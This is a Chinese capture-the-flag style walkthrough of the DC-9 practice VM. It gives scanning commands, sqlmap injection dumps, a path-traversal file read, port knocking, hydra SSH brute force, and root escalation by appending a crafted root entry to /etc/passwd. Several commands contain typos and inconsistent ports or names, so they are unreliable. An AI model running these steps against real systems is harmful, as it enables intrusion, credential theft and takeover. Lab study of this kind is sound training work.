DC-9靶机渗透实战

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢!

信息收集

#主机探测-端口扫描

arp-scan -l
nmap -F -T4 -sS 192.168.43.13

#指纹识别-目录爆破

whatweb 192.168.43.13
dirsearch -u 192.168.43.13

#web界面

#直接AWVS跑--存在sql注入漏洞--results.php

search存在注入漏洞

 

#sqlmap梭哈

#由于是POST请求发送数据,所以这里指定–date参数为search

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -dbs

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -D 'users' --tables

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -D 'users' -T 'UserDetails' --dump

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -D 'Staff' -T 'users' --dump

#把得到的账密保存下来,为后续ssh爆破做准备
#存在一串密文“856f5de590ef37314e7c3bdf6f8a66dc ”  MD5解密---transorbital1
#解密网站:https://www.somd5.com/

 

#登录web账密

#存在任意文件读取漏洞

#页面底部存在 “File does not exist"
#可能存在任意文件读取漏洞

#查看knock配置文件

#由于之前nmap扫描时,22端口为filter状态,猜测应该是knock这个服务存在
#knockd 服务的默认配置路径:/etc/knockd.conf
#利用file协议
#?file=../../../../../../etc/knock.conf

#开启22端口

#拿到开门密码:三个端口碰撞一下
#安装knock工具,对获取的端口实现碰撞
knock 192.168.43.13 7469 8475 9842
或者
nc 192.168.43.13 7649
nc 192.168.43.13 8475
nc 192.168.43.13 9842

 

#海德拉爆破ssh账密

#将之前保存下来的账密作为字典
hydra -L user.txt -P miam.txt 192.168.43.13 ssh

#ssh登录三个用户

joeyt,chandleb,janitor
ssh joerty#192.168.43.13
ssh chandleb@192.168.43.13
ssh janitor@192.168.43.13

#janitor存在多余目录

#查看此目录--存在密码--追加miam.txt
echo XXX,XXX,XXX >> miam.txt

#二次爆破

hydra -L user.txt -P miam.txt
#得到jerey账密

#ssh登录

ssh ferdf@192.168.43.13

#提权

#寻找提权方法
sudo -l
find / -user root -perm -4000 -print 2>/dev/null

/opt/devstuff/dist/test/test下存在无密码可执行root权限文件

#查看test.py

cat test.py
#该if语句命令行参数的数量是否为3,
如果不是,则打印最常用信息并退出检查脚本。
在else分支中,首先打开第一个命令行参数指定的文件,并以串口模式读取其内容。
打开第二个命令行参数指定的文件,并以追加模式将第一个文件的内容写入其中。
最后,关闭文件。

#提权
openssl passwd -1 -salt admin admin
-1    #使用md5加密
-salt #自动锚入一个随机参数作为文件内容加密
echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' >> pass
#权限不够,cd /tmp
sudo /opt/devstuff/dist/test/test pass /etc/passwd

#FLAG

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值